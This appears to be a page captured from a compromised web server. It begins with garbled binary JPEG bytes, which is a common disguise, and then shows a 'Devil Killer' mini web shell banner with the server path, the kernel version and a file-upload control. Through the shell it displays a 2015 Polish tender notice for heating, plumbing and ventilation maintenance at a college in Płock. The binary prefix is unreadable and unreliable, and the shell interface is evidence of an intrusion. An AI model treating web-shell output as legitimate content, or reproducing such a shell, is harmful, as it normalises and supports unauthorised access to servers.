JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/335836-N-2015.html

<p class="kh_header"><b>Płock: Wykonanie usługi konserwacji  instalacji sanitarnych, węzłów cieplnych i kotłowni oraz usługi konserwacji instalacji i urządzeń wentylacyjno-klimatyzacyjnych na obiektach Państwowej Wyższej Szkoły Zawodowej  w Płocku.</b><br>
<b>Numer ogłoszenia: 335836 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 24 3665400, faks 24 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi konserwacji  instalacji sanitarnych, węzłów cieplnych i kotłowni oraz usługi konserwacji instalacji i urządzeń wentylacyjno-klimatyzacyjnych na obiektach Państwowej Wyższej Szkoły Zawodowej  w Płocku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji  instalacji sanitarnych, węzłów cieplnych i kotłowni (część 1) oraz usługi konserwacji instalacji i urządzeń wentylacyjno-klimatyzacyjnych (część 2) na obiektach Państwowej Wyższej Szkoły Zawodowej  w Płocku.
CZĘŚĆ 1
       1.Budynki PWSZ w Płocku, ul. Gałczyńskiego 28  
           dwa węzły cieplne  - 650 kW 
           instalacje  centralnego  ogrzewania  
           sieci i instalacje wodno- kanalizacyjne

2.Budynek PWSZ w Płocku, ul. Kościuszki 20        
   jeden węzeł cieplny  200 kW 
   instalacje centralnego  ogrzewania 
   sieci i instalacje wodno- kanalizacyjne

3.Budynek PWSZ w Płocku, ul. Zubrzyckiego 8     
   piec gazowy 10 kW 
   instalacja  centralnego  ogrzewania 
   siec i instalacja wodno- kanalizacyjna

       4.Budynki PWSZ w Trzepowie Nowym              
          piec olejowy 700 kW 
          instalacje  centralnego  ogrzewania 
          sieci i instalacje wodno- kanalizacyjne

5. Budynki PWSZ w Płocku, Pl. Dąbrowskiego 2     
    dwa węzły cieplne o łącznej mocy 640 kW
    instalacje centralnego ogrzewania
    sieci i instalacje wodno-kan. 
6. Dom Studenta w Płocku, Nowowiejskiego 6     
    węzeł cieplny 300kW
          instalacje  centralnego  ogrzewania 
           sieci i instalacje wodno- kanalizacyjne

Węzły cieplne i kotłownie
  W zakres usługi wchodzą okresowe przeglądy i zabiegi konserwacyjne urządzeń  dokonywane   dwa razy w roku w następujących terminach:
    I- przegląd wiosenny po okresie grzewczym w terminie do 30 kwietnia każdego roku.
   II- przegląd jesienny przed okresem grzewczym do 01 października każdego roku.

Wykonanie czynności konserwacyjnych w kotłowniach
Podjęcie procedur w celu umożliwienia uruchomienia kotłowni przed rozpoczęciem sezonu grzewczego, ich włączenie, a następnie ich wyłączenie po zakończeniu sezonu.
Konserwacja kotłów zgodnie z Dokumentacją Techniczno-Ruchową (DTR), instrukcjami obsługi i konserwacji kotłów oraz zgodnie z przepisami i zaleceniami producenta w zakresie wymaganym do prawidłowej pracy.
Dozór nad eksploatacją kotłowni zgodnie ze szczegółowymi zasadami eksploatacji kotłów w sposób zapewniający właściwe i zgodne z przeznaczeniem ich wykorzystanie oraz racjonalne i oszczędne użytkowanie paliw i energii, a w szczególności zgodnie z instrukcjami eksploatacji kotłowni.
Wykonywanie dozoru i konserwacji kotłowni przez osoby posiadające niezbędne kwalifikacje i uprawnienia .
Wykonywanie przeglądów, konserwacji i napraw  kotłów oraz automatyki (w tym instalacji elektrycznych węzłów)  i pozostałych urządzeń zamontowanych w kotłowni każdorazowo przed rozpoczęciem i po zakończeniu sezonu grzewczego.
Dokonywanie kontroli i konserwacji naczyń ciśnieniowych, także kontroli sprawdzania sprawności działania zaworów bezpieczeństwa do ich wymiany włącznie w przypadku stwierdzenia nieprawidłowego funkcjonowania - współpraca z Urzędem Dozoru Technicznego.
Zapewnienie całodobowej gotowości do usuwania usterek, awarii i zakłóceń w pracy kotłowni dla zapewnienia ciągłości dostawy ciepła do odbiorców.
Wykonywanie czyszczenia urządzeń kotłowni zgodnie z DTR kotłów i urządzeń.
Wymianę materiałów eksploatacyjnych tj. części zamiennych, których konieczność cyklicznej wymiany wynika z DTR urządzeń kotłowni gazowych i olejowych (między innymi takich jak: filtry, dysze, elektrody zapłonowe, czujniki, fotokomórki).
Utrzymywania czystości i porządku w pomieszczeniach kotłowni. 
Zakres dozoru i konserwacji kotłowni obejmuje przeprowadzanie kontroli pracy kotłów , a w szczególności:
-dokonywanie analizy spalin i regulacji palnika dla uzyskania maksymalnej sprawności i minimalnej emisji substancji szkodliwych - komputerowy pomiar spalania,
- dokonywanie regulacji obiegów grzewczych przez zmiany nastaw sterownika kotła,
- dokonywanie kontroli czujników zainstalowanych w kotłach i w instalacji grzewczej,
- sprawdzanie działania zabezpieczeń kotłowni i konserwacja urządzeń zabezpieczających wg terminów podanych w zaleceniach producentów,
- sprawdzanie szczelności systemu  olejowego,
- wykrywanie i usuwanie usterek w pracy urządzeń kotłowni.
Przygotowanie kotła i urządzeń kotłowni do przeglądu technicznego dokonywanego przez Urząd Dozoru Technicznego.

Wykonanie czynności konserwacyjnych w węzach cieplnych, przegląd w miarę potrzeb lecz nie rzadziej niż raz w miesiącu z wyjątkiem poz. 6, 11,18.
1 Sprawdzenie prawidłowości działania zaworów regulacyjnych i zabezpieczających w węźle cieplnym.
2.	Sprawdzenie prawidłowości działania odpowietrzników.
3.	Sprawdzenie prawidłowości działania manometrów i termometrów.
4.	Sprawdzenie prawidłowości działania i ewentualna wymiana wodomierzy na dopustach wody do instalacji co.
5.	Sprawdzenie i regulacja ciśnienia w naczyniach przeponowych.
6.	Sprawdzenie stanu rozdzielaczy co. - przegląd raz na 6 miesięcy,
7.	Sprawdzenie prawidłowości działania zaworów w węźle po stronie instalacji co. i cw (od rozdzielaczy).
8.	Usuwanie nieszczelności zaworów kołnierzowych i ich konserwacja.
9.	Wymiana uszkodzonych śrubunków, holendrów i uszczelek w połączeniach kołnierzowych na rurociągach w węźle, po stronie instalacji co., ct, i cw (od rozdzielaczy).
10.	Wymiana niesprawnych manometrów i termometrów.
11.	Wymiana uszkodzonych odcinków rur w węźle, po stronie instalacji co., ct, i cw (od rozdzielaczy), o długości do 2m, nie więcej niż jedna wymiana w miesiącu.
12 Uzupełnianie wody w instalacjach co. i cw.
13.	Odpowietrzanie instalacji co. i cw.

14.	Uzupełnianie i naprawa izolacji termicznej rurociągów w węźle po strome instalacji co. i cw,                          (od rozdzielaczy) oraz na rozdzielaczach co.
15.	Uzupełnianie opisów i oznakowań rurociągów i urządzeń.
16.	Udrażnianie kanalizacji w węźle.
17.	Konserwacja i ewentualna wymiana zaworów czerpalnych i syfonu zlewowego.
18.	Zmywanie wodą brudu z izolacji, rurociągów i urządzeń - nie rzadziej, niż raz w roku.

Czynności konserwacyjne instalacji centralnego ogrzewania - z wyjątkiem poz. 7 - raz w miesiącu
1.   Sprawdzenie stanu rurociągów instalacji co. w budynku prowadzonych po wierzchu.
2.	Lokalizowanie ewentualnych nieszczelności rurociągów co. skrytych w ścianach i posadzkach.
3.	Sprawdzenie, czyszczenie i ewentualna wymiana grzejników.
4.	Sprawdzenie i ewentualna wymiana odpowietrzników automatycznych.
5.	Sprawdzenie zaworów termostatycznych i termostatów z ewentualną ich wymianą.
6.	Sprawdzenie nastaw regulacyjnych zaworów termostatycznych i regulacja instalacji co..
7.	Sprawdzenie temperatury powietrza wewnętrznego - w miarę potrzeb.
Czynności konserwacyjne Instalacji wodociągowych (zw i cw) oraz kanalizacja  fekalna i deszczowa 
      
      1. Sprawdzenie widocznych rurociągów instalacji wodociągowych w budynku.
      2. Lokalizowanie ewentualnych nieszczelności rur wodociągowych skrytych w ścianach i posadzkach.
      3. Wymiana uszkodzonego odcinka rur wodociągowych o dł. do 4m wraz z kształtkami,- nie więcej niż jedna wymiana w miesiącu
      4. Usuwanie nieszczelności zaworów kołnierzowych i ich konserwacja.
      5. Sprawdzenie, konserwacja i ewentualna wymiana zaworów i baterii czerpalnych oraz natryskowych, i zaworów pływakowych w spłuczkach ustępowych.
 6. Sprawdzenie i ewentualna wymiana przyborów sanitarnych (miski ustępowe, natryski,      umywalki, 
              zlewy)
     7. Sprawdzenie szczelności widocznych rurociągów kanalizacyjnych .
                    8. Sprawdzenie i czyszczenie wpustów podłogowych, czyszczaków i syfonów,
      9. Sprawdzenie, konserwacja i ewentualna wymiana zaworów kulowych i klapowych,  zwrotnych,	
    10. Sprawdzanie i czyszczenie rynien, czyszczaków rynnowych - w miarę potrzeb lecz nie rzadziej niż   raz w roku.
    11.Wymiana uszkodzonego odcinka prowadzonej po wierzchu kanalizacji wewnętrznej o dl. do 2 / m, wraz z  kształtkami, - nie więcej niż jedna wymiana w miesiącu.
 12.Sprawdzenie pracy kanalizacji zewnętrznej pomiędzy wylotami z budynku a miejską studnią   ściekową

Warunki prowadzenia konserwacji
-Materiały podstawowe zakwalifikowane do wymiany w czasie wykonania czynności bieżących oraz  zgłoszone w trybie awarii i przypadków losowych, zapewni Zamawiający.
- Serwis i konserwacja urządzeń powinny być wykonywane zgodnie z zaleceniami      producenta.
- Sprawdzenie stanu technicznego i niezbędna konserwacja urządzeń w terminie 
     wynikającym z warunków gwarancji. 
  - W przypadku stwierdzenia konieczności naprawy instalacji ,przewodów i urządzeń posiadających                    gwarancje -  natychmiastowe  informowanie Zamawiającego o   konieczności dokonania napraw.                                -W przypadku gdy warunki gwarancji poszczególnych urządzeń wymagają  dokonywania
   przeglądów technicznych przez producenta, zleceniobiorca zobowiązany jest do 
   zawiadomienia Zamawiającego o konieczności wzywania odpowiednich podmiotów.
- Przestrzegania instrukcji, określonych w warunkach gwarancji udzielonych przez 
   producentów urządzeń.
- Dokonywania wszelkich przeglądów określonych w warunkach gwarancji karty 
   gwarancyjnej dla zainstalowanych urządzeń  niezbędnych do zachowania praw wynikających z  gwarancji                                                                                                                                                       - Konserwator dokonuje w/w przeglądów w terminach opisanych w zakresie konserwacji, bez wezwania ze  strony Zamawiającego usługę oraz sporządza stosowne dokumenty np.(protokół przeglądu).
-	Konserwator jest osiągalny telefonicznie w ciągu całej doby i przystępuje do usunięcia awarii niezwłocznie po odebraniu zgłoszenia, i nie później niż w ciągu 3 godzin.
-	Działania konserwacyjne będą odnotowane w książce konserwacji, w której zawarte będą 
         następujące informacje:
-	imię, nazwisko i telefon konserwatora,
-	opis awarii z podaniem daty jej powstania
- opis prac konserwacyjnych z podaniem miejsca i daty ich wykonania.
       Konserwacja będzie rozliczana raz w miesiącu.
      Podstawą wystawienia faktury będzie protokół odbioru prac konserwacyjnych podpisany przez upoważnionego pracownika zamawiającego usługę lub inspektora nadzoru zamawiającego.

Wykonawca jest zobowiązany po dokonaniu przeglądów w terminie  do 30 października 2016r. sporządzić wykaz robót remontowych instalacji  i urządzeń  sanitarnych przewidzianych do ewentualnego zaplanowania w roku następnym.

Wykonawca zobowiązany jest do zapewnienia wszelkich niezbędnych pozwoleń oraz sprzętu typu dźwig, podnośnik itp. w celu prawidłowej realizacji usługi. Koszt wynajmu dźwigu oraz podnośnika pokrywa po uprzedniej akceptacji ceny Zamawiający.

Termin wykonania zamówienia: 
Od 1 stycznia  2016r. do 30 czerwca 2017r.
CZĘŚĆ 2
Planowany zakres prac obejmuje: 
Przedmiotem zamówienia objęta jest obsługa konserwacyjna, polegająca na dokonaniu przeglądów wiosennych i jesiennych oraz  usuwanie usterek i dokonywanie naprawy instalacji i urządzeń wentylacyjno-klimatyzacyjnych oraz aparatury kontrolno-pomiarowej i urządzeń do automatycznego sterowania na następujących obiektach:

- Rektorat przy ul. PL. Dąbrowskiego 2
- Instytut Nauk Humanistycznych i Społecznych przy ul. Gałczyńskiego 28
- Instytut Nauk Ekonomicznych i Informatyki w Nowym Trzepowie
- Budynek PWSZ w Płocku, ul. Zubrzyckiego 8

Podstawowymi elementami tych instalacji są: 
1. Zlokalizowane w Płocku przy ul Gałczyńskiego 28 (aktualnie na gwarancji)                                                                                 centrale klimatyzacyjne firmy BARTOSZ BIAŁYSTOK
  DNWB-C2 10 wraz z agregatem skraplającym CLINT MHA/K  71
  DNWB-C2 12 wraz z agregatem skraplającym CLINT MHA/K  131
  DNWB-C2 21 wraz z agregatem skraplającym CLINT MHA/K  202
2. Zlokalizowane w Płocku przy ul. PL. Dąbrowskiego 2
  produkcji firmy VTS Polska Gdańsk
  centrala podwieszana CPV
 3. Zlokalizowane w Nowym Trzepowie k/Płocka
  centrala wentylacyjno-klimatyzacyjna VENTUS produkcji firmy VTS Gdańsk
 4. Budynek PWSZ w Płocku, ul. Zubrzyckiego 8 wentylacja mechaniczna

Ogólne czynności konserwacyjne:

Utrzymanie urządzeń i instalacji wentylacji mechanicznej i klimatyzacji we właściwym stanie technicznym zapewniającym im maksymalnie sprawną, bezawaryjną i bezpieczną eksploatację zgodną z zasadami wiedzy technicznej i zaleceniami DTR a w szczególności:
- Sprawdzenie stanu technicznego i niezbędna konserwacja wyżej wymienionych urządzeń.
- Dokonywanie odpowiednich nastaw układów regulacyjnych i automatyki - według potrzeb.
- Sprawdzenie stanu szczeliwa o odporności ogniowej zabezpieczającego przejścia   przewodów wentylacyjnych przez ściany budynku. 
- Sprawdzenie stanu okładzin ognioodpornych kanałów wentylacyjnych.
- Sprawdzenie stanu technicznego i niezbędna konserwacja urządzeń w terminie 
   wynikającym z warunków gwarancji.
- W przypadku stwierdzenia konieczności naprawy instalacji ,przewodów i urządzeń posiadających gwarancje - pisemne  informowanie Zamawiającego o konieczności dokonania napraw z podaniem przyczyny ich powstania.
- W przypadku gdy warunki gwarancji poszczególnych urządzeń wymagają dokonywania przeglądów technicznych przez producenta, zleceniobiorca zobowiązany jest do  zawiadomienia Zamawiającego o konieczności wzywania odpowiednich podmiotów.
- Przestrzegania instrukcji, określonych w warunkach gwarancji udzielonych przez 
   producentów urządzeń.
- Dokonywania wszelkich przeglądów określonych w warunkach gwarancji i karty 
   gwarancyjnej dla zainstalowanych klimatyzatorów niezbędnych do zachowania praw
   wynikających z gwarancji
- Pisemne zgłaszanie ilości i rodzaju potrzebnych filtrów bądź materiałów eksploatacyjnych.
-Konserwator jest osiągalny telefonicznie w ciągu całej doby i przystępuje do usunięcia awarii niezwłocznie po odebraniu zgłoszenia, i nie później niż w ciągu 3 godzin.


Szczegółowy zakres przeglądów. 

W zakres usługi wchodzą okresowe przeglądy i zabiegi konserwacyjne urządzeń dokonywane dwa razy w roku oraz usuwanie usterek i dokonywanie bieżących napraw instalacji i urządzeń wentylacyjno-klimatyzacyjnych w termine:
  I- przegląd jesienny przed okresem grzewczym do 15 października każdego roku.
 II- przegląd wiosenny po okresie grzewczym w terminie do 30 kwietnia każdego roku.
   według poniższego zakresu czynności:
- oględziny ogólne i ocena stanu technicznego urządzeń
- ocena stanu zespołu wentylatorowego (kontrola stanu zużycia łożysk, sprawdzenie     stanu i naciągu pasków klinowych, ewentualna wymiana pasków, sprawdzenie i regulacja przekładni pasowej)
- ocena stanu wymienników ciepła, czyszczenie i prostowanie lamel
- sprawdzenie stanu zabrudzenia filtrów i ewentualnie ich wymiana
- pomiar prądów pobieranych przez odbiorniki energii elektrycznej
- sprawdzenie poprawności działania układu chłodniczego (sprawdzenie szczelności układu, ciśnienie freonu, temperatur pracy)
- kontrola pracy i przetestowanie układu automatyki kontrolno-pomiarowej, sprawdzenie poprawności działania zainstalowanych zabezpieczeń
- kontrola parametrów pracy i przepływu powietrza przez urządzenie.
Wykonawca jest zobowiązany w terminie  do 30 października 2016r. sporządzić wykaz robót remontowych instalacji  i urządzeń wentylacyjnych przewidzianych do ewentualnego zaplanowania w roku następnym.

Obowiązki Zamawiającego:

Zamawiający  udostępni dokumentację techniczną oraz książki gwarancyjne.
Poinformuje pracowników Wykonawcy o obowiązujących przepisach bezpieczeństwa o ile będą miały one znaczenie dla prawidłowego wykonania usługi.
Zapewni możliwość realizacji usługi  udostępniając niezbędne pomieszczenia. 
Zamawiający pokryje koszty materiałów eksploatacyjnych niezbędnych do wykonania usługi. Na zakupione materiały zostanie wystawiona osobna faktura.
Zamawiający dokona zapłaty Wykonawcy za wszystkie materiały  na które przedstawi   pisemne wyliczenie wartości kosztów materiałów  i uzyska akceptację ze strony Zamawiającego przed ich wbudowaniem. 

Osoby które będą uczestniczyć w wykonaniu zamówienia, powinny posiadać wymagane uprawnienia. Zamawiający uzna za  spełnienie tego warunku, posiadanie  Świadectwa Kwalifikacji w zakresie eksploatacji i  napraw oraz  obsługi technicznej urządzeń i instalacji wentylacyjnych, aparatury kontrolno-pomiarowej i urządzeń do ich automatycznego sterowania.

Termin wykonania zamówienia: 
Od 1 styczeń  2016r. do 30 czerwca  2017r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2, 50.72.00.00-8, 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca dysponował:
- dla części I - minimum 1 osobą posiadającą uprawnienia budowlane do kierowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych,
- dla części II - minimum 1 osobą posiadającą świadectwa kwalifikacji w zakresie eksploatacji i napraw oraz obsługi technicznej urządzeń i instalacji wentylacyjnych, aparatury kontrolno-pomiarowej i urządzeń do ich automatycznego sterowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty
a)	formularz ofertowy- Załącznik nr 1,
b)	pełnomocnictwo /oryginał lub kopia poświadczona notarialnie/ osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów,
c)	w przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone liderowi /patrz Rozdział III pkt 9/,
d)	Zobowiązanie podmiotu trzeciego - Załącznik nr 6 (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
